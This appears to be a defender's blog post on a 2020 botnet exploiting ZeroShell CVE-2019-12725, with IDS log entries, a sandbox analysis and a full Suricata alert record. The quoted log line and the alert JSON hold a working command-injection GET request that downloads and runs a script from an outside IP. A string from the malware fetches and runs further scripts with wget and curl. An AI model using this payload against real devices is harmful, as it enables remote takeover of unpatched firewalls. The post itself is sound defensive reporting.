A New Botnet is Targeting Network Infrastructure

Starting a little less than two weeks ago, my IDS sensors have been detecting the spread of a new botnet. Unlike previous Mirai botnets, this appears to specifically target the GNU/Linux firewall distribution, “ZeroShell”. While it’s not especially dangerous as far as botnets are concerned, it does appear to be rather vigorous when it sends probes.

However, we got lucky this time. Just as quickly it appeared, the C&C server went offline stopping the spread of this worm dead in its tracks. Still, this serves as a useful lesson to every network admin - patch soon; patch often.

CVEs

This particular exploit is CVE-2019-12725, a CVSS 9.8 vulnerability in the HTTP parser that can lead to remote code execution with a crafted GET request. Though this appears to be a (fairly) old vulnerability, hackers have been working hard recently to exploit unpatched devices.

The maintainers of ZeroShell have also addressed this vulnerability on their official blog. The date of the CVE and subsequent blog post are both nearly a year ago at this point, so most devices should have been patched by now.

Exploit

According to my ElasticSearch database, the first hit on my home server was 2020/07/20, and originated from Guangzhou, China. However, the first time that an alert was generated was 2020/07/25. This makes sense, since the ET rule that identified this exploit (id 1:2030597) was only created on 2020/07/24.

Since then, I have observed exploitation attempts from over 50 unique IPs, from China, Russia, South Korea, Canada, UK, Norway, and the United States. At this point, it’s safe to say this is a widespread issue only limited by the size of the ZeroShell user community.

Indicators

An exploitation attempt will likely leave this in your HTTPD logs:

183.60.213.205 - - [20/Jul/2020:09:03:23 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 301 178 "-" "-"

Chasing down the exploit was rather interesting. Soon after discovering this malware, I submitted a sample to CrowdStrike’s free sandbox:

https://www.hybrid-analysis.com/sample/18c164f8a12e26fa7960feb35e762b5c34d223e75b5d0b22c8736bb875041d07/5f11f67622e86b52232a7f8a

The first stage was a simple bash script which attempts to download and run various payloads depending on the CPU architecture (mips, arm, x86 etc). Then, the second stage malware is downloaded. I analyzed the x86 version, since it will easily run inside the sandbox environment:

https://www.hybrid-analysis.com/sample/6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95/5f1203b1c5a55050bc05ffb4

Interesting content

The executable is a statically linked, stripped ELF binary. Looking inside it, there are some interesting strings:

 shell:cd /data/local/tmp; busybox wget http://5.206.227.228/wget -O -> wwww; sh wwww; curl -O http://5.206.227.228/curl; sh curl; rm wwww curl

This command downloads two additional scripts from the same server, wget or wwww and curl. Despite the familiar names, these are indeed malware scripts. Unfortunately, by the time I noticed these the server had been taken down or blocked.

Also contained in the binary is a link to a youtube video, titled “NOW YOU FUCKED UP” https://www.youtube.ru/watch?v=OGp9P6QvMjY

I am not sure if the creator of the video is at all affiliated with this malware sample, and I won’t speculate.

Stroke of Luck

Thankfully, the server that was distributing the malware quickly went offline.

Today the server seems to be dormant, at least according to Shodan: https://www.shodan.io/host/5.206.227.228

And, fortunately the binaries analyzed had the IP address hardcoded in, meaning that the hosts already infected won’t spread anymore.

Full Event Details

A sample event is provided:

{
  "_index": "logstash-2020.07",
  "_type": "doc",
  "_id": "xxxx",
  "_version": 1,
  "_score": null,
  "_source": {
    "dest_port": 80,
    "tags": [
    ],
    "log": {
      "file": {
        "path": "/var/log/suricata/eve.json"
      }
    },
    "beat": {
      "version": "6.8.10",
      "hostname": "fw",
      "name": "fw"
    },
    "app_proto": "http",
    "source": "/var/log/suricata/eve.json",
    "tx_id": 0,
    "timestamp": "2020-07-25T08:14:37.117055-0400",
    "flow_id": 0000000,
    "host": {
      "name": "fw"
    },
    "offset": 0000000,
    "flow": {
      "pkts_toserver": 4,
      "bytes_toserver": 390,
      "bytes_toclient": 566,
      "pkts_toclient": 4,
      "start": "2020-07-25T08:14:36.413400-0400"
    },
    "@timestamp": "2020-07-25T12:14:38.095Z",
    "proto": "TCP",
    "prospector": {
      "type": "log"
    },
    "alert": {
      "metadata": {
        "deployment": [
          "Perimeter"
        ],
        "former_category": [
          "MALWARE"
        ],
        "performance_impact": [
          "Low"
        ],
        "signature_severity": [
          "Major"
        ],
        "updated_at": [
          "2020_07_24"
        ],
        "created_at": [
          "2020_07_24"
        ],
        "attack_target": [
          "Networking_Equipment"
        ]
      },
      "category": "Attempted Administrator Privilege Gain",
      "action": "allowed",
      "rev": 2,
      "signature_id": 2030597,
      "gid": 1,
      "signature": "ET EXPLOIT [401TRG] ZeroShell RCE Inbound (CVE-2019-12725)",
      "severity": 1
    },
    "src_ip": "183.60.213.205",
    "@version": "1",
    "src_port": 5157,
    "event_type": "alert",
    "stream": 1,
    "input": {
      "type": "log"
    },
    "in_iface": "eth0",
    "http": {
      "url": "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22",
      "http_method": "GET",
      "protocol": "HTTP/1.0",
      "length": 0
    },
    "geoip": {
      "city_name": "Guangzhou",
      "location": {
        "lon": 113.25,
        "lat": 23.1167
      },
      "country_name": "China",
      "region_code": "44",
      "ip": "183.60.213.205",
      "region_name": "Guangdong",
      "country_code3": "CN",
      "timezone": "Asia/Shanghai",
      "longitude": 113.25,
      "continent_code": "AS",
      "latitude": 23.1167,
      "country_code2": "CN"
    },
    "dest_ip": "10.x.x.x"
  },
  "fields": {
    "flow.start": [
      "2020-07-25T12:14:36.413Z"
    ],
    "@timestamp": [
      "2020-07-25T12:14:38.095Z"
    ]
  },
  "highlight": {
    "event_type": [
      "@kibana-highlighted-field@alert@/kibana-highlighted-field@"
    ],
    "http.url": [
      "/cgi-bin/@kibana-highlighted-field@kerbynet@/kibana-highlighted-field@?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22"
    ]
  },
  "sort": [
    1595679278095
  ]
}
comments powered by Disqus